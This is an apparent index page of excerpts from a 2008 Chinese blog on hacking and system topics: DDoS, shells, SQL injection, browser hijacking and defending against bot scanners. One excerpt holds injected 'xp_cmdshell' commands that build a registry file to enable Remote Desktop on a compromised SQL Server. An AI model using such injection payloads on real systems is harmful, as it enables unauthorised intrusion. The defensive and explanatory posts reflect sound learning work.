您正在查看 "Learn Notes" 分类下的文章
2008-07-13 10:29
一、为何要DDOS?
随着Internet互联网络带宽的增加和多种DDOS黑客工具的不断发布,DDOS拒绝服务攻击的实施越来越容易,DDOS攻击事件正在成上升 趋势。出于商业竞争、打击报复和网络敲诈等多种因素,导致很多IDC托管机房、商业站点、游戏服务器、聊天网络等网络服务商长期以来一直被DDOS攻击所 困扰,随之而来的是客户投诉、同虚拟主机用户受牵连、法律纠纷、商业损失等一系列问题,因此,解决DDOS攻击问题成为网络服务商必须考虑的头等大事。
二、什么是DDOS?
DDOS是英文Distributed Denial of Service |
2008-07-02 15:16
经常有一些朋友向我询问如何黑客技术入门,其实我也不是很清楚,就是靠自学而已。今天就结合我的经验写篇文章给一些想学习hacker技术的朋友补习下,老鸟就闪吧。
转载请注明出处:http://hi.baidu.com/biweilun
小菜们大概经常听到一些黑客讲,拿到服务器的shell了,觉得很兴奋,看了这么多的黑客文章,可能大家对shell并不是了解很深。为了让《网友世界》的FANS们能尽快步入黑客技术的殿堂,今天我给大家带来了这篇文章。究竟什么是shell?shell有哪些种类?怎么样能 |
2008-06-20 16:28
From:http://hi.baidu.com/biweilun
系统环境里面有很多环境变量,可我知道的也不算很多,比如%systemroot% 这就是一个为大众所熟知的环境变量。你在“开始”→“运行”里面输入“%systemroot%”,回车,打开的就是系统路径:C:\windows了。如果你在“开始”→“运行”里面输入的是“%temp%”的话,回车,打开的则是 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp 这个路径,%ProgramFiles%对应的则是“C:\Program F |
2008-06-10 10:44
注意:ubuntu 的ISO有两个版本,desktop 和 alternate,
desktop 版本的安装其实是以 livecd 方式启动后再安装,实际上的安装就是复制的过程,速度
比较快。
而 alternate 提供了传统的安装方式,也提供了更多的可控制选项,比如文本安装,OEM安装
desktop不支持我下面要说的硬盘安装方法,不过我在这里的论坛看到有从硬盘启动livecd的方
法,应该可行。
硬盘启动安装 desktop livecd的方法见这里:
|
2008-06-08 9:52
我的话:这篇不是我写的,感觉看后很是受骗的感觉!本以为会用其他的SQL过程来搞,想不到,哎,居然是cmdshell的应用... 唔,好无语
exec master..xp_cmdshell 'echo Windows Registry Editor Version 5.00>>c:\hi.reg';--
exec master..xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>c:\hi.reg';--
exec master..xp_cmdshell 'echo "fDenyTSConnections"=dword:00000000>>c:\hi.reg';--
exec master |
2008-06-08 9:42
2008-05-30 20:16
一个EXE引发的危机——浏览器劫持实战篇 作者:小金
一. 一个EXE引发的危机
网络程序员小李最近有点忙,公司要做的网页工程项目已经快到尾期了,可是开发小组的进度仍然迟迟跟不上来,为了赶进度,小李去国外下了一些代码回来参考,但那些代码的关键部分都是用了字符编码的形式加密的,小李不想手工一段段的解码,就上网搜索了一个号称能解码脚本字符编码的工具,下载回来的是一个安装包,文件名为“downsoft226.exe”,小李要急着用,看也没看就双击执行 |
2008-05-29 10:17
2008-05-26 19:35
本文发表于《网友世界》2008年第10期上
作者:毕伟伦 转载请注明出处
俗话说,常在网上飘,哪能不挨刀?小菜们的防范意识差,机器的漏洞百出,而自己不会补上,往往成了黑客抓的“肉鸡”却浑然不觉。写惯了攻击的文章,今天写篇防守的文章,希望对大家有帮助,让大家放心地在网上冲浪,在黑客眼皮底下溜走。
首先说下一般的抓鸡软件的工作流程:扫描IP段→发现存活主机→扫描存活主机的端口号→发掘漏洞→针对存活主机的漏洞进行入侵。我们要让他在第二个阶段就断下来 |
2008-05-05 16:26
文章出处:MIAO'S Blog http://www.mhack.cn/article.asp?id=114
目前,一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在,常见的搜索功能代码如下:
..................
keyword=trim(request.From("keyword")
获取客户端提交在要查询的关键字,并过滤了两边的空格
if keyword="" then 如果 |
